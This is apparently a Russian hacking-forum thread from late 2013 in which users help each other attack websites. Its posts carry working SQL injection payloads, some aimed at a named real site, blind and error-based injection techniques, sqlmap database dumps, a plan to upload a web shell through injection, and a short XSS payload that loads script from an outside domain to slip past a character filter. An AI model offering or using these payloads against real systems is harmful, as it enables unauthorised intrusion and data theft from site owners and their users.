Ваши вопросы по уязвимостям.

Massay · 29 Dec 2013

//del

imprenko · 29 Dec 2013

OxoTnik said:

Бекдор не работает потому что в формате html? а не потому что записывается несколько раз в файл
Click to expand...

ага точно.
а что можно сделать ?

imprenko · 29 Dec 2013

OxoTnik said:

ну прочти конфиги БД и подключись к примеру
Click to expand...

пароли знаю.
я насчет шелла возможно как нить залить через скулю?

GhostW · 29 Dec 2013

Massay said:

Помогите пожалуйста розкрутить sql инъекцию
Click to expand...

С чего ты взял что там что-то есть?

Massay · 29 Dec 2013

GhostW said:

С чего ты взял что там что-то есть?
Click to expand...

Вывод ошибки есть.

Inoms · 29 Dec 2013

Massay said:

Вывод ошибки есть. Только тогда когда вы авторизируетесь на сайте.
Без авторазции запрос - http://5.firepic.org/5/images/2013-12/29/3l1jmnodztsg.png
С авторизацию - http://5.firepic.org/5/images/2013-12/29/q8wgot3vlbg6.png
Click to expand...

У меня в браезере что с вашей сессией, что без - кидает на второй скрин, ничего не меняется. Попробуйте выполнить
<request action="save"><param name="CH_FLAGS">777") and extractvalue(1,concat(1,user()))=("1</param></request>
Там вероятно update используется, хотя возможно и простая выборка.

Massay · 29 Dec 2013

Inoms said:

<request action="save"><param name="CH_FLAGS">777") and extractvalue(1,concat(1,user()))=("1</param></request>
Там вероятно update используется, хотя возможно и простая выборка.
Click to expand...

DB Error
You have an error in your SQL syntax;

er9j6@ · 29 Dec 2013

Massay said:

DB Error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and extractvalue(1,concat(1,user()))=("1")' at line 1
Click to expand...

чем передаешь POST-запросы? Не могу добиться выводы ошибки в Http Analyzer

Massay · 29 Dec 2013

POST запрос передаю через плагин в Мозиле, HackBar.

Inoms · 30 Dec 2013

*Удалено по просьбе автора*

imprenko · 30 Dec 2013

sqlmap вывел таблици
только вот кодировка непонятная не могу в нормальный вид вывести
помогите пожалуйста....
back-end DBMS: Microsoft Access
Database:
[2 tables]
+--------------------------------------------------------------+
| {AIP|h3I$0?QE?2§4%H87HFE\n>p |
| {AIP|\x154%\x12\x11H87H\x1fFE\\n>p |
+--------------------------------------------------------------+

randman · 30 Dec 2013

OxoTnik said:

В общем атака посредством XSS

фильтры
Фильтруется побел
Фильтруется +
Ограничение на количество символов до 140 символов

Пробовал кодировать чтобы убрать пробелы, но не вписывался в количество символов

сам запрос вписывается в 36 символов, но присутствует 1 пробел

как обойти?
Click to expand...

Вставка в параметр или в тело?

PHP:

<script/src=//asd.ru></script>

30 Символов. Если найти 5-буквенный домен, это 29. Может быть как-то еще закрывающий тег можно опустить.

P.S. Два слэша означают использование протокола сайта(HTTPS при HTTPS и HTTP при HTTP).

Always · 3 Jan 2014

http://www.btlt.ru/comp/index.php?a=p&cat=8 and substring(@@version,1,1)=5

а дальше никак...!
окажите помощь!

Always · 3 Jan 2014

er9j6@ said:

Вбиваешь в Havij, и крутишь
5.1.70-log
Click to expand...

так неинтересно!

Inoms · 3 Jan 2014

Always said:

так неинтересно!
Click to expand...

В пяти шагах отсюда и union есть: http://www.btlt.ru/comp/index.php?a=f&id=911 union select version(),user(),database()

Always · 3 Jan 2014

Inoms said:

В пяти шагах отсюда и union есть: http://www.btlt.ru/comp/index.php?a=f&id=911 union select version(),user(),database()
Click to expand...

но мне тот линк интересен, как его крутануть?!

qaz · 4 Jan 2014

такой вопросец,

http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=ascii(substring(user(),1,1))
не дает вывода на страницу, почуму?

ведь ascii(substring(user(),1,1)) ровняется 116

так нормальнро выводится
http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=116

я как-то запрос не так составл?

qaz · 4 Jan 2014

er9j6@ said:

так не пробовал выводить?
http://www.btlt.ru/comp/index.php?a=f&id=1+union+select+1,2,table_name+fRoM+information_schema.tables+limit+41,1+--+
Click to expand...

меня интересует именно мой вопрос

Inoms · 4 Jan 2014

qaz said:

такой вопросец,

http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=ascii(substring(user(),1,1))
не дает вывода на страницу, почуму?

ведь ascii(substring(user(),1,1)) ровняется 116

так нормальнро выводится
http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=116

я как-то запрос не так составл?
Click to expand...

Вызов функций в limit'е ? lol

Massay · 4 Jan 2014

Привет всем, есть инъекция вида

http://site.com/index.php?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 0,1)))--
Click to expand...

Как можно автоматизировать подбор limit. И как можно узнать другие базы данных, не information_schema.

Ваши вопросы по уязвимостям.

Massay New Member

imprenko New Member

imprenko New Member

GhostW Member

Massay New Member

Inoms Member

Massay New Member

er9j6@ Elder - Старейшина

Massay New Member

Inoms Member

imprenko New Member

randman Members of Antichat

Always New Member

Always New Member

Inoms Member

Always New Member

qaz Elder - Старейшина

qaz Elder - Старейшина

Inoms Member

Massay New Member

Useful Searches

Ваши вопросы по уязвимостям.

Massay New Member

imprenko New Member

imprenko New Member

GhostW Member

Massay New Member

Inoms Member

Massay New Member

er9j6@ Elder - Старейшина

Massay New Member

Inoms Member

imprenko New Member

randman Members of Antichat

Always New Member

Always New Member

Inoms Member

Always New Member

qaz Elder - Старейшина

qaz Elder - Старейшина

Inoms Member

Massay New Member